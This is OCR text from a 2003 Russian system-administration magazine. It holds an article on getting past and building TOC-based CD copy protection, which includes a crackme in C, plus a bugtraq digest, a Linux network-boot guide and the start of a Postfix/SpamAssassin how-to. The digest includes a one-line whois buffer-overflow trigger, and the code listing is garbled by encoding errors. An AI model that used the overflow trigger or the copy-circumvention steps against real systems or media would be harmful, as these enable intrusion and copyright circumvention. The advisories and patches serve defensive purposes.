Именно так! Конечно, не стоит путать некопируемость диска
автоматическими копировщиками с принципиальной невоз-
можностью получения его идентичной копии. В ручном ре-
жиме копирование таких дисков вполне осуществимо (прав-
да, при условии, что ваш пишущий привод поддерживает
режим RAW DAO, а читающий – читает сектора из обоих
секций), и сейчас мы продемонстрируем как.
Так как же все-таки скопировать
такой диск?
Конечно, с помощью «Добермана Пинчера» (или любого
другого блочного копировщика файлов), HIEW, двух об-
разов защищенного диска (один – с первой сессией – от
Clone CD, другой – со второй сессией – от Alcohol) мы
можем воссоздать идентичную копию оригинального дис-
ка путем их совокупного объединения, но… это будет как-
то не по-хакерски, да и вообще некрасиво.
Чтобы не писать свою собственную программу «про-
жига» диска, ограничимся использованием Clone CD.
При условии, что подсунутый ему образ диска запечат-
лен правильно, Clone CD обычно справляется с прожи-
гом «на ура». Итак, у нас есть более и менее верный
файл image.ccd, содержащий TOC, но недостает файла
образа image.img. Попробуем его получить? Будем от-
талкиваться от того, что LBA-адреса всех секторов дис-
ка пронумерованы последовательно, включая области,
занятые Lead-In/Lead-Out и прочим служебным барахлом.
Разумеется, непосредственное чтение служебных обла-
стей диска на секторном уровне невозможно, но… имен-
но на этом мы и собираемся сыграть! Последовательно
читая диск с первого по последний сектор, мы обнару-
жим, что сектора с LBA-адресами с 0 по 2055 сектор
включительно читаются без каких-либо проблем, после
чего наступает сумеречная зона нечитающихся секто-
ров, протянувшаяся вплоть до сектора 13307. Здесь сек-
тора либо совсем не читаются либо возвращаются в
сильно мутированном виде, легко опознаваемые по от-
сутствию правильной синхропоследовательности в их
заголовке. Наконец, с адреса 13308 чтение вновь про-
должается без каких-либо проблем.
Судя по всему мы имеем дело с двухсессионным диском
и сумеречная зона между сессиями есть ни что иное, как
Lead-Out/Lead-In. Накинув два сектора на post-gap (при ус-
ловии, что он записан с соблюдением стандарта), получа-
42
ем, что LBA-адрес последнего значимого сектора первой
сессии составляет 2057 или, в пересчете на абсолютные
единицы – 00 минут, 29 секунд и еще 32 фрейма. Соответ-
ственно, LBA-адрес первого сектора второй сессии равен
13308 + 150 (pre-gap) == 13458, или 3 минуты, 1 секунда,
33 фрейма. Конечно, если исследуемый диск содержит боль-
шое количество ошибок, то его анализ значительно услож-
няется, т.к. физические дефекты на секторном уровне мо-
гут выглядеть точно так же, как Lead-In/Lead-Out-области,
конечно, при том условии, что дефективные области имеют
соответствующую протяженность, – а это вряд ли.
Отбросив сектора, расположенные в зонах pre- и post-
gap (т.е. 150 секторов от конца первой читаемой области и
ровно столько же от начала следующей), мы должны объе-
динить их в один файл, используя для этой цели любой
файловый копировщик (например, штатную команду MS-
DOS copy file_1 /b + file_2 image.img). Остается прочитать
сырой TOC SCSI/ATAPI командой READ TOC (opcode: 43h,
format: 2h) и записать его в image.ccd файл в соответствии
с синтаксисом Clone CD. Как альтернативный вариант –
можно воспользоваться ccd-файлом, сформированным
программой Alcohol, предварительно скорректировав pre-
gap Mode (как уже сказано выше, Alcohol определил его
неправильно, перепутав Mode 1 с Mode 2). Согласно стан-
дарту режим сектора задается пятнадцатым, считая от
нуля, байтом его заголовка. Если этот байт равен одному
(что, собственно, и наблюдается в нашем случае), то и
Mode сектора будет 1, но не 2.
При условии, что все сделано правильно, после запи-
си собственноручно сформированного образа диска мы
получаем практически идентичный оригинал. Просто? Да
проще простого! И написать автоматический копировщик,
автоматизирующий наш труд, можно буквально за не-
сколько часов! Если чтение «сырых» секторов с диска
представляет для вас проблему, воспользуйтесь исход-
ными текстами утилит ASPI32.raw/SPTI.raw, как раз та-
кое чтение и осуществляющих.
Так что искажение TOC – не очень-то надежный прием
защиты от копирования, как ни крути. Правда, от обычных
пользователей, вооруженных Clone CD/Alcohol, он все-таки
спасает, а больше от защиты зачастую и не требуется.
Пример реализации защиты
на программном уровне
Покажем теперь, как такая защита может быть реализо-
вана на программном уровне. Самое простое, что можно
сделать, – отправить приводу команду «сырого» чтения
TOC (opcode: 43h, format: 2h) и сравнить возращенный ею
результат с эталоном. Какие именно поля TOC защита
будет проверять, – это ее личное дело. По минимуму дос-
таточно проверить количество сессий и стартовый адрес
искаженного трека. По максимуму можно контролировать
весь TOC целиком. Естественно, от побайтового сравне-
ния контролируемого TOC с оригиналом настоятельно ре-
комендуется воздержаться, т.к. это неявно закладывает
защиту на особенности микропрограммной прошивки
читающего привода. Стандарт ничего не говорит о том, в
каком порядке должно возвращаться содержимое TOC, и
потому его бинарное представление может варьировать-
 администрирование
ся от привода к приводу. Грамотно спроектированная за- CDB[7] = HIBYTE(MAX_TOC_SIZE); // ðàçìåð...
CDB[8] = LOBYTE(MAX_TOC_SIZE); // ...áóôåðà
щита должна анализировать только те поля, к содержи-
мому которых она привязывается явно. // ÷èòàåì TOC
while(1)
Демонстрационный пример, приведенный ниже, как раз {
и иллюстрирует технику корректной привязки к TOC. Разу- // ïîñûëàåì CDB-áëîê SCSI/ATAPI-óñòðîéñòâó
a = SEND_SCSI_CMD(argv[1], CDB, ATAPI_CDB_SIZE, ↵
меется, явная проверка целости TOC может быть элемен- NO_SENSE, TOC, MAX_TOC_SIZE, SCSI_DATA_IN);
тарно обнаружена хакером и выкинута из программы как // TOC óñïåøíî ïðî÷èòàí, ðâåì êîãòè
if (a == SCSI_OK) break;
ненужная, поэтому не стоит копировать этот демонстраци-
онный пример один к одному в свои программы. Лучше // ïðîèçîøëà îøèáêà. Âîçìîæíî ïðèâîä íå ãîòîâ?
// âûäåðæèâàåì ïàóçó
используйте значения полей TOC как рабочие константы, Sleep(TRY_DELAY);
жизненно необходимые для нормальной работоспособно- // ìàêñèìàëüíîå êîëè÷åñòâî ïîïûòîê óæå âûøëî?
if (try++ == MAX_TRY)
сти программы, – в этом случае сличение паспортов с ли- { fprintf(stderr,"-ERR: can not read ↵
цами будет не столь наглядным. Естественно, явная про- TOC\x7\n"); return -1;}
}
верка оригинальности диска все равно обязана быть, но
ее основная цель отнюдь не защитить программу от взло- // TOC ïðî÷èòàí, ïðèñòóïàåì ê åãî àíàëèçó
//---------------------------------------
ма, а довести до сведения пользователя, что проверяемый
диск с точки зрения защиты не является лицензионным. // ïðîâåðêà êîëè÷åñòâà ñåññèé
if ((TOC[3] - TOC[2]) != (_N_SESSION-1))
{fprintf(stderr, "-ERR: not original ↵
Ëèñòèíã 8. Äåìîíñòðàöèîííûé ïðèìåð ïðîñòåéøåé çàùèòû, ïðèâÿ- CD\n");return -1;}
çûâàþùåéñÿ ê èñêàæåííîìó TOC è íå ïîçâîëÿþùåé ñåáÿ êîïèðîâàòü.
// ïðîâåðêà ñòàðòîâîãî LBA-àäðåñà òðåêà _TRACK
/*-------------------------------------------------------- //--------------------------------------------
* // îïðåäåëåíèå ðåàëüíîé äëèíû TOC
* crack me 9822C095h real_len = TOC[0]*0x100L+TOC[1];
* ================== // ïåðåáîð âñåõ entry
* for (a = 4; a < real_len; a+=11)
* äåìîíñòðàöèÿ òåõíèêè ïðèâÿçêè ê èñêàæåííîìó TOC; {
* äëÿ ðàáîòå ïðîãðàììå òðåáóåòñÿ ëàçåðíûé äèñê, ïðîææåííûé // ýòî íàø òðåê?
* ñîîòâåòñòâóþùèì îáðàçîì if (TOC[a+3] == _TRACK)
---------------------------------------------------------*/ if ((((TOC[a + 4]∗60L) + TOC[a + 5])∗75L) + ↵
#include <stdio.h> TOC[a + 6] != _TRACK_LBA)
#include <windows.h> {fprintf(stderr, "-ERR: ↵
#include "CD.h" not original LBA\n"); ↵
#include "SPTI.h" return -1;}
#include "ASPI32.h" else
break;
// ïàðàìåòðû çàùèùåííîãî äèñêà, êîòîðûå ìû áóäåì ïðîâåðÿòü }
//------------------------------------------------------–
#define _N_SESSION 2 // êîëè÷åñòâî ñåññèé // ýòî îðèãèíàëüíûé äèñê!
#define _TRACK 1 // íîìåð ïðîâåðÿåìîãî òðåêà printf("Hello, original CD\n");
#define _TRACK_LBA 0x6B124 // ñòàðòîâûé LBA-àäðåñ }
// òðåêà _TRACK
Предлагаемая защита не копируется Clone CD (т.к. он
// ïàðàìåòðû ïðîãðàììû
//-------------------- создает всего одну сессию вместо ожидаемых двух), но
#define MAX_TRY 3 // ìàê. êîë-âî ïîïûòîê ÷òåíèÿ TOC легко обходится Alcohol, который хоть и помещает на
#define TRY_DELAY 100 // çàäåðæêà ìåæäó ïîïûòêàìè
#define MAX_TOC_SIZE (2352) // ìàêñèìàëüíûé ðàçìåð TOC место первой секции непотребный мусор, зато вполне кор-
ректно воссоздает оригинальный TOC.
main(int argc, char **argv) Для усиления защиты мы можем попытаться не только
{ проверять обе сессии на существование, но и контролиро-
// îñíîâíûå ïåðåìåííûå
long a, real_len, try = 1; вать целостность их содержимого. Разумеется, не обяза-
// ñþäà áóäåò ÷èòàòüñÿ TOC тельно перелопачивать каждую из секций целиком. Доста-
unsigned char TOC[MAX_TOC_SIZE];
// SCSI CDB-áëîê äëÿ SCSI/ATAPI-óñòðîéñòâ точно выбрать несколько ключевых секторов, желательно
unsigned char CDB[ATAPI_CDB_SIZE]; имеющих по возможности уникальное содержимое. По-
// TITLE стойте! – воскликнет внимательный читатель. Разве автор
fprintf(stderr,"crackme 9822C095 by Kris Kaspersky\n"); не предостерегал нас о последствиях такой проверки?!
if (argc <2) Ведь никто не может гарантировать, что на оборудовании
{ пользователя эти сектора вообще прочтутся! Что ж, отве-
fprintf(stderr,"USAGE:crackme.9822C095h.exe ↵
drive\n"); чу я. Закладываться на читабельность секторов действи-
fprintf(stderr,"\tdrive - \\\\.\\X: or ↵ тельно категорически не рекомендуется, но вот контроли-
Trg.Lun\n");
return -1; ровать успешно просчитавшиеся сектора можно и нужно!
} То есть: если ключевые сектора не читаются, то все ок и
// èíèöèàëèçàöèÿ áóôåðîâ нет никаких поводов считать диск нелицензионным – это
memset(CDB, 0, ATAPI_CDB_SIZE); memset(TOC, 0, ↵ просто у конечного пользователя оборудование такое (в
MAX_TOC_SIZE);
смысле кривое). Другое дело, если чтение секторов про-
// ãîòîâèì CDB-áëîê шло без ошибок, но вместо ключевых данных в них оказа-
CDB[0] = 0x43; // READ TOC
CDB[2] = 0x2; // RAW TOC лось нечто совсем иное. Вот тогда, действительно, пробле-
CDB[6] = 0; // íîìåð ïåðâîé ñåññèè ма не в оборудовании, а в диске.

№9(10), сентябрь 2003 43

 администрирование
Усиленный вариант защиты уже не копируется Alcohol
(т.к. вместо оригинального содержимого первой сессии
Alcohol помещает на диск какой-то дикий мусор), но мо-
жет быть скопирован вручную по методике, описанной
выше. К тому же, привязка к искаженному TOC элемен-
тарно отламывается в отладчике/дизассемблере. Так что
дальнейшее совершенствование защиты практически
полностью бессмысленно. От «простых смертных» пользо-
вателей мы уже защитились, а от хакеров мы не сумеем
защититься все равно (во всяком случае, не этим спосо-
бом). В любом случае более продвинутые защиты – тема
отдельного разговора.
Условные обозначения

Под приводом NEC понимается _NEC CD-RW NR-9100A;
firmware version 1.4.

Под приводом ASUS понимается ASUS CD-S500/A;
firmware version 1.4K.

Под приводом PHILIPS понимается PHILIPS CDRW2412A;
firmware version P1.55.
Alcohol 120% – отличный копировщик защищенных дис-
ков, условно-бесплатную версию которого можно утянуть с
сайта http://www.alcohol-soft.com/. Автоматически ломает
более половины всех существующих типов защит от копи-
рования и позволяет динамически монтировать образы за-
щищенных дисков на виртуальный привод CD-ROM, что
очень удобно для экспериментов. К сожалению, монтирова-
нию подлежат лишь «правильные» образы, коими большин-
ство образов защищенных дисков отнюдь не являются.
Clone CD – хороший копировщик защищенных дисков,
условно-бесплатную версию которого можно утянуть по
следующему адресу: http://www.elby.ch/. С копированием
защищенных дисков в полностью автоматическом режи-
ме Clone CD справляется скорее плохо, чем хорошо, од-
нако после ручного шаманства с настройками и непос-
редственно самим образом защищенного диска он мо-
жет скопировать добрую половину существующих типов
защит. Утверждение о том, что Clone CD «берет» практи-
чески все существующие защиты от копирования, – лож-
ное и невероятно далеко от действительности.
Глоссарий
Lead-In Area – вводная область диска. Служебная область
диска, по сути своей представляющая нулевой трек, все-
гда предшествующий первому треку PA. Каждая сессия
многосессионного диска имеет собственную вводную об-
ласть. Размер вводной области по стандарту составляет
9 мегабайт (60 секунд, или 4500 секторов). Q-канал под-
кода вводной сессии содержит TOC, среди прочей полез-
ной информации, указывающей либо на адрес выводной
области (закрытый диск), либо на адрес вводной области
следующей сессии (открытый диск). Содержимое ввод-
ной области недоступно для чтения на программном уров-
не. Визуально вводная область выглядит равномерно ос-
вещенным блестящим кольцом.
Lead-Out Area – выводная область диска. Служебная
область диска, условно обозначаемая треком номер AAh
и замыкающая собой всякую закрытую сессию. Вывод-
44
1
Посмотрите внимательно на лицевую панель своего
CD-ROM, видите – внизу лотка расположено крохотное
отверстие порядка 1 мм в диаметре? Воспользовавшись
любым длинным тонким и достаточно прочным предме-
том, например, металлической канцелярской скрепкой,
слегка приоткройте лоток, введя «отмычку» в указанную
дырку до упора и еще чуть-чуть надавив. Все! – дальше
лоток можно выдвинуть уже руками. Внимание! Во-пер-
вых, проделывайте эту операцию только при выключен-
ном компьютере, а во-вторых, держите «отмычку» строго
горизонтально, иначе вы можете промазать и угодить в
какой-нибудь нежный узел, основательно его повредив.
ная область служит своеобразным индикатором конца
сессии и/или диска и помогает оптической головке не
вылететь за пределы диска. Пишущие приводы должны
корректно обрабатывать диски с незакрытыми сессиями,
однако обыкновенные приводы CD-ROM и аудиопроигры-
ватели это делать не обязаны. Внимание! Отсутствие
выводной сессии (равно как и некорректное задание ее
адреса) может повредить некоторые модели приводов
(один из них PHILIPS).
Емкость выводной области односессионного диска по
стандарту составляет 13,5 Mб (6750 секторов или 1,5 ми-
нуты). Емкость выводных областей для второй и после-
дующих сессий многосессионных дисков уменьшена до
4 Мб (0,5 минуты, или 2250 секторов). Содержимое вы-
водной области недоступно на программном уровне. Ви-
зуально выводная область выглядит равномерно освещен-
ным блестящим кольцом.
Program Area – программная область. Область диска,
расположенная между Lead-In- и Lead-Out-областями и со-
держащая информационные треки с музыкой или данны-
ми. Это – основная область диска, целиком доступная на
секторном уровне с паузами между аудиотреками вклю-
чительно.
TOC – (Table Of Content) – таблица содержимого или
попросту оглавление диска. Служебная область диска,
записанная в Q-канале подкода вводной области диска,
также называемой Lead-In-областью (такое блестящее
кольцо у внутреннего края диска). Многосессионный диск
имеет несколько независимых TOC – по одному TOC на
каждую закрытую сессию.
TOC содержит информацию о стартовых адресах ввод-
ной/выводной областей диска и атрибуты всех его треков
(как-то тип трека: аудио или данные, а если данные, то в
каком режиме – Mode 1, Mode 2 и т. д., абсолютный стар-
товый адрес трека и номер соответствующей ему сессии).
Также TOC содержит часть ATIP и указатели на местопо-
ложение ее продолжения.
Непосредственно (т.е. на секторном уровне) для чте-
ния TOC недоступен, но для извлечения его содержимо-
го в «сыром» виде можно воспользоваться следующей
SCSI/ATAPI командой READ TOC/PMA/ATIP (операцион-
ный код: 43h) с format field == 2h.
Однако не стоит путать TOC с файловой системой –
между ними нет ничего общего! Файловые системы на
лазерных дисках хранятся непосредственно в PM и сво-
бодно доступны для чтения на секторном уровне.

Переполнение буфера через
веб-приложение в GNU Whois-клиенте
Переполнение буфера обнаружено в GNU Whois-клиен-
те. Веб-приложения, которые вызывают whois, позволя-
ют удаленному пользователю выполнить произвольный
код. Воздействие зависит от того, как приложение вызы-
вает или интегрирует Whois-клиента.
Посылая специально обработанное значение для име-
ни хоста, когда вызывается whois с «-g» параметром ко-
мандной строки, локальный или удаленный пользователь
может вызвать переполнение буфера:
astharot@astharot <mailto:astharot@astharot> astharot ↵
$ whois -g `perl -e "print 'a'x2000"`
Когда whois использует отдельное приложение, пере-
полнение буфера позволяет локальному пользователю
выполнить произвольный код с привилегиями локально-
го пользователя (что само по себе не является уязвимос-
тью защиты). Однако некоторые веб-приложения, исполь-
зующие whois, могут позволить удаленному пользовате-
лю выполнить произвольный код с привилегиями веб-сер-
вера.
Уязвимость обнаружена в GNU Whois 4.6.6 и более ран-
них версиях.
Для устранения уязвимости измените следующую
строку в файле whois.c
sprintf(p--, "-%c %s ", ch, optarg);
на
snprintf(p--, sizeof(fstring), "-%c %s ", ch, optarg);
Удаленное выполнение произвольного
кода в Helix Universal Server и RealServer
Уязвимость обнаружена в RealNetworks Helix Universal
Server. Удаленный пользователь может выполнить про-
извольный код с root-привилегиями.
Удаленный пользователь может запросить URL, содер-
жащий большое число определенных символов, чтобы
заставить сервер выполнить произвольный код. Недоста-
ток находится в обработчике протокола.
Уязвимость обнаружена в Helix Universal Server 9 и
более ранних версиях (RealSystem Server 8, 7 и RealServer
G2).
Удаленный отказ в обслуживании
в Piolet File Sharing-клиенте
Отказ в обслуживании обнаружен в Piolet File Sharing-кли-
енте. Удаленный пользователь может аварийно завершить
работу клиента.
Удаленный пользователь может подключиться к целе-
вому клиенту на 701 TCP-порт и послать чрезмерное ко-
личество данных, чтобы аварийно завершить работу це-
левого клиента. Согласно сообщению, атака не будет за-
регистрирована приложением.
Уязвимость обнаружена в Piolet File Sharing Client 1.05.
Способов устранения обнаруженной уязвимости не су-
ществует в настоящее время.
№9(10), сентябрь 2003
bugtraq
Удаленный отказ
в обслуживании в Sendmail
Уязвимость обнаружена в почтовом сервере Sendmail.
Удаленный атакующий, способный контролировать отве-
ты DNS-сервера, может аварийно завершить работу по-
чтового сервера или выполнить произвольный код на уяз-
вимом сервере.
Уязвимость обнаружена в конфигурациях, в которых
используется DNS-маппинг в файле sendmail.cf.
Функция dns_parse_reply() формирует цепочку
RESOURCE_RECORD_T-структур (динамически распреде-
ляя память для них). Из-за неправильной инициализации
этих структур, когда sendmail получает плохой DNS-ответ
(в котором фактический размер ответа не равен заявлен-
ному), структура вызывает dns_free_data (sm_resolve.c:227)
с rr_next полем последней цепочки структуры, запол-
ненной мусором. В dns_free_data() sendmail попытает-
ся освободить цепочку структур – пройдет через цепоч-
ку, используя rr_next указатель и останавливаясь, когда
rr_next == NULL. Мусор в rr_next поле заставит sendmail
вызвать free() на случайном адресе. В результате ра-
бота Sendmail аварийно завершится.
Уязвимость обнаружена в sendmail 8.12.8 и более ран-
них.
Sendmail выпустил небольшую заплату, устраняющую
обнаруженную уязвимость:
--- sm_resolve.c.orig Fri Jun 28 00:43:24 2002
+++ sm_resolve.c Thu Jul 10 01:21:17 2003
@@ -233,6 +233,7 @@
dns_free_data(r);
return NULL;
}
+ memset(*rr, 0, sizeof(**rr));
(*rr)->rr_domain = sm_strdup(host);
if ((*rr)->rr_domain == NULL)
{
Истощение памяти
в системном вызове semget(2)
в операционной системе OpenBSD
Уязвимость обнаружена в операционной системе
OpenBSD в системном вызове semget(2). Локальный
пользователь может аварийно завершить работу систе-
мы.
Системный вызов semget(2) не проверяет размеры гра-
ниц в пользовательских данных. Локальный пользователь
может выполнить специально обработанный запрос, что-
бы заставить функцию использовать всю доступную па-
мять, что приведет к зависанию системы.
Уязвимость обнаружена в OpenBSD version 3.3.
Для устранения уязвимости установите соответству-
ющее обновление, которое можно скачать отсюда:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/
002_semget.patch
Составил Александр Антипов
45
администрирование

ЗАГРУЗКА ПО СЕТИ

46
 администрирование
Многие современные материнские платы позволяют заг-
ружать операционную систему не только с жесткого дис-
ка или дискеты, но и по сети. Причем загружаться по
сети «умеют» компьютеры как со встроенными сетевы-
ми адаптерами, так и обладающие внешними сетевыми
карточками.
В этой статье мы рассмотрим, как загрузить операци-
онную систему Linux по сети. Многие дистрибутивы по-
зволяют устанавливать операционную систему по сети.
Однако не нужно путать установку по сети и загрузку по
сети. В первом случае вы загружаетесь с системной дис-
кеты, а дальше программа установки просто копирует все
необходимые ей файлы, находящиеся, как правило, на
каком-то FTP-сервере, на ваш компьютер. В случае с заг-
рузкой по сети файлы не копируются на ваш компьютер,
а загружаются по сети при необходимости. Сначала заг-
ружается ядро системы (мы говорим о Linux), а потом не-
обходимые ему файлы – корневая файловая система (с
использованием NFS). Данный способ позволяет нам ис-
пользовать бездисковые станции. Если вам нужна «слу-
жебная» бездисковая станция, которая будет выполнять
только определенные задачи, например, принт-сервера
или шлюза, можно вовсе отказаться от NFS, а загружать
все сразу – и ядро, и корневую файловую систему – лишь
бы оперативной памяти хватило.
Примечание: NFS (Network File System) – сетевая фай-
ловая система. Позволяет монтировать файловые систе-
мы, находящиеся на удаленных компьютерах.
Наверное, вы знаете, что существуют так называемые
NFS-дистрибутивы, которые также позволяют хранить все
необходимые файлы на NFS-сервере. Но NFS-дистрибу-
тив нельзя использовать на бездисковых станциях. Как
минимум для запуска такого дистрибутива на рабочей
станции должен быть установлен обычный дисковод для
гибких дисков. Загрузчик LILO (или любой другой) загру-
жается с дискеты, затем вы передаете ему несколько па-
раметров, как минимум два:

root=/dev/nfs – сообщает ядру, что мы будем исполь-
зовать загрузку по NFS;

nfsroot – указывает путь к корневой файловой систе-
ме в формате:

[<server_ip>:]<root_dir>[,<nfs_options>]

Как видите, ядро знает, что корневая файловая сис-

тема загружается по NFS. Сейчас мы попробуем сделать
так, чтобы ядро даже «не заметило», что оно загружает-
ся по сети. Для этого мы будем использовать серверы rarp
(Reverse Address Resolution Protocol) и tftp (Trivial File
Transfer Protocol). Сервер rarp мы будем использовать для
того, чтобы сопоставить MAC-адрес бездисковой станции
определенному IP-адресу нашей локальной сети. Сервер
tftp будет хранить наш загрузочный образ, о котором мы
поговорим немного позже.
Теперь приступим к практической реализации. Для на-
чала сопоставим MAC-адрес бездисковой станции IP-ад-
ДЕНИС КОЛИСНИЧЕНКО ресу нашей сети. Как я уже говорил, для этого будем ис-
пользовать сервер rarp, который должен быть установлен
на вашей системе.

№9(10), сентябрь 2003 47

 администрирование
/sbin/rarp –s 192.168.1.117 00:00:a1:77:e5:c9
Данную команду нужно включить в сценарий загрузки
вашей системы, чтобы не вводить ее вручную при каж-
дом запуске. Проблему идентификации нашей станции
можно решить и по-другому – с помощью DHCP. Для это-
го в файле конфигурации /etc/dhcpd.conf нужно прописать
директиву host для каждой бездисковой станции:
host net_pc1{
hardware ethernet 00:00:a1:77:e5:c9
fixed-address 192.168.1.117
}
Как определить MAC-адрес сетевой платы? Для этого
существует много программ, но целесообразнее исполь-
зовать стандартные программы, которые всегда есть под
рукой: в Linux – это ifconfig, а в Windows – winipcfg (рис. 1).
Ðèñóíîê 1. Ïðîãðàììà winipcfg
Ядру Linux нужно будет передать параметр ip, опреде-
ляющий настройки IP-интерфейса. В общем случае он
выглядит так:
ip=<client_ip>:<server_ip>:<gateway>:<netmask>: ↵
<hostname>:<device>:<autoconf>
Как это сделать, вы узнаете чуть позже, а пока рас-
смотрим несколько примеров:

Мы используем протокол BOOTP:
ip=::::net_pc1::bootp

Мы используем сервер rarp:
ip=::::net_pc1::rarp
48

Мы указываем статический IP-адрес 192.168.1.117:
ip=192.168.1.117:192.168.1.1:192.168.1.1: ↵
255.255.255.0:net_pc1:eth0:
Сервер BOOTP можно с успехом заменить сервером
DHCP, однако с небольшими изменениями в файле кон-
фигурации. Пример файла конфигурации будет приведен
в конце статьи. Имя net_pc1 должно быть прописано в
файле /etc/hosts или сервере DNS:
192.168.1.117 net_pc1.domain.ru net_pc1
Теперь можно приступить к настройке сервера tftp.
Установите сервер tftp. После установки в каталоге /etc/
xinetd.d появится специальный файл, содержащий пара-
метры запуска сервиса tftp. Вы можете отредактировать
их по своему усмотрению, после чего нужно перезапус-
тить сервис xinetd:
service xinetd restart
Если же у вас до сих пор используется устаревший
суперсервер inetd, в файл /etc/inetd.conf нужно добавить
следующую строку (или раскомментировать ее, если она
уже есть):
tftp dgram udp wait root /bin/in.tftpd in.tftpd –s /tftp
Как обычно, нужно перезапустить сервис inetd, чтобы
изменения вступили в силу. В каталог /tftp нужно помес-
тить тот самый образ, содержащий ядро и базовую кор-
невую файловую систему.
Вот теперь самое время поговорить об образе и о
тех файлах, которые он должен содержать. Начнем, по-
жалуй, с ядра. Перекомпилируйте ядро, включив в него
поддержку сети, файловой системы ext2 и Initial RAM
disk support (секция Block devices). Все остальное от-
ключайте по максимуму – ведь мы же не хотим переда-
вать вместе с ядром несколько мегабайт дополнитель-
ных модулей. Если у вас одна бездисковая станция,
возможно, такой режим работы не скажется на функ-
ционировании всей сети, но попробуем представить, что
таких станций у нас десять и все они включаются одно-
временно… Можно даже отключить поддержку моду-
лей – все, что нужно, вы поместите в ядро. Такое ядро
не будет компактным, но с одним файлом вам будет
проще работать.
После того, как ядро будет откомпилировано, жела-
тельно проверить его работоспособность – запишите его
на дискету и загрузитесь с нее:
cat bzImage > /dev/fd0
rdev /dev/fd0 /dev/hda1
rdev –v /dev/fd0 –1
rdev –R /dev/fd0 1
rdev –r /dev/fd0 0
Команда rdev используется в случае, если ядро и кор-
невая файловая система находятся на разных дисках. В
нашем случае ядро – на дискете, а файловая система –

на жестком диске (раздел /dev/hda1). Если загрузка про-
шла успешно, значит, ваше ядро вполне работоспособно
и его можно использовать.
Самое сложное – еще впереди. Вам нужно самостоя-
тельно подготовить набор файлов корневой файловой
системы, то есть создать свой небольшой дистрибутив.
Подробнее о создании микродистрибутивов вы може-
те прочитать:

в статье Всеволода Стахова «Создание загрузочных
дискет и CD-дисков Linux», которая была опублико-
вана в июньском номере «Системного администра-
тора»;

в статье «Изготовление мульти-загрузочного CD-дис-
ка» (http://gazette.linux.ru.net/);

на моем сайте dkws.narod.ru.
Конечно, всегда можно пойти по пути наименьшего со-
противления и использовать уже готовый микродистри-
бутив, помещающийся на одной – двух дискетах. Такой
дистрибутив очень легко найти в сети. Конкретный дист-
рибутив советовать не буду, поскольку выбор зависит от
выполняемых им функций.
Кроме ядра и файловой системы Linux, наш образ дол-
жен содержать загрузчик Linux: кто-то ведь должен пере-
дать параметры ядру Linux (вы еще не забыли о парамет-
ре ip?). Подойдет любой загрузчик, который в состоянии
справиться с возложенной на него задачей – передачей
параметров ядру. Если файл образа уже готов, можно
записать загрузчик прямо в него – Linux все равно с чем
работать – с файлом или устройством. Вот конфигураци-
онный файл lilo.conf:
boot=/tftp/net.img
prompt
timeout=50
compact
vga=normal
read-only
image=/vmlinuz
label=linux
append=" ip=::::nfs-client::bootp"
Когда ваш образ будет полностью готов, запишите его
в каталог /tftp и можно попробовать запустить бездиско-
вую станцию (не забудьте в SETUP включить загрузку по
сети). Не получается? Тогда переименуем файл образа
следующим образом:
ln –sf net.img C0A80175.I586
Откуда взялось такое страшное имя? Все очень про-
сто: IP-адрес бездисковой станции записывается в шес-
тнадцатиричном формате, все точки игнорируются. За-
тем через точку записывается код архитектуры бездис-
ковой станции (прописными буквами). Код архитектуры
можно узнать, выполнив команду arch… на бездисковой
станции. А как же ее выполнить – ведь там нет операци-
онной системы? Тогда просто попробуйте угадать – это
несложно. Скорее всего, у вас будет установлен процес-
сор фирмы Intel или совместимый с ним, значит, первая
буква кода будет I. Затем следует код процессора – 386,
486, 586 (Pentium), 686 (Pentium II, Celeron).
№9(10), сентябрь 2003
администрирование
Вот сейчас все должно быть нормально. Во всяком
случае, ядро системы должно загрузиться по сети. Если
возникнет ошибка во время загрузки системы, то это оз-
начает только одно – вы где-то допустили ошибку при
«сборке» собственного микродистрибутива.
Обычно бездисковые станции используются в качестве
служебных компьютеров, например, маршрутизаторов
или шлюзов. А что делать, если вам нужна полноценная
рабочая станция, скажем, X-терминал, за которым днями
и ночами должны работать пользователи (например, вы
создаете малобюджетное интернет-кафе)? Тогда наш заг-
рузочный образ должен содержать только ядро и загруз-
чик без файловой системы. Загрузчик должен передать
ядру следующие параметры:
root=/dev/nfs nfsroot=192.168.1.1:/exports/nfs
192.168.1.1 – это IP-адрес сервера NFS.
В файле /etc/exports указываются экспортируемые
файловые системы:
/exports/nfs (ro)
/exports/nfs-rw (rw)
/mnt/cdrom net_pc1(ro)
Первая строка означает, что экспортируется файло-
вая система /exports/nfs и доступ к ней в режиме «только
чтение» (read only – ro) получат все компьютеры. К фай-
ловой системе /exports/nfs-rw также получат доступ все
компьютеры, но в режиме «чтение-запись». К CD-ROM
получит доступ только компьютер net_pc1.
Как и обещал, привожу небольшой фрагмент файла
конфигурации /etc/dhcpd.conf, позволяющего серверу
DHCP работать в режиме BOOTP:
subnet 192.168.1.0 255.255.255.0 {
option subnet-mask 255.255.255.0;
option domain-name-servers 192.168.1.1;
# Åñëè âû íå óêàæåòå äèðåêòèâó dynamic-bootp, âàø DHCP-ñåðâåð
# íå áóäåò ðàáîòàòü â ðåæèìå BOOTP
range dynamic-bootp 192.168.1.100 192.168.1.200
}
host net_pc1{
hardware ethernet 00:00:a1:77:e5:c9
fixed-address 192.168.1.117
}
Все ваши вопросы и комментарии к статье буду рад
выслушать по адресу: dhsilabs@mail.ru
Ссылки:
1. Пакет Bootkit, предназначенный для создания загру-
зочных дисков:
ftp://sunsite.unc.edu/pub/Linux/system/Recovery/
2. Очень много ссылок на микродистрибутивы Linux:
http://www.linuxlinks.com
3. Много программ для создания загрузочных дисков:
http://www.ibiblio.org/pub/Linux/system/recovery/
4. Сайт http://dkws.narod.ru – много полезной документа-
ции по Linux, в том числе документы Howto на русском
языке.
49
администрирование

POSTFIX+...+SPAMASSASSIN
MINI-HOWTO
Спам. Рассылка рекламы. Бороться
с нежелательной почтой можно
по-разному. Эта статья расскажет,
как прикрутить фильтр SpamAssassin
к MTA Postfix. Надеюсь, статья получится
выдержанной в стиле mini-howto.

АНДРЕЙ МОЗГОВОЙ
50

Пожалуйста, не пытайтесь прикрутить фильтр к ненаст-
роенному/работающему серверу Postfix. Далее будем по-
лагать, что у читателя настроен и нормально работает по-
чтовый сервер и уже установлен SpamAssassin.
Установка SpamAssassin (коротко): SpamAssassin – это
perl-модуль. Состоит из трех основных частей:

spamd – daemon, к которому подключается клиент;

spamc – client, который подключается к spamd. На вход
клиенту подаются письма, с выхода забираются от-
фильтрованные письма;

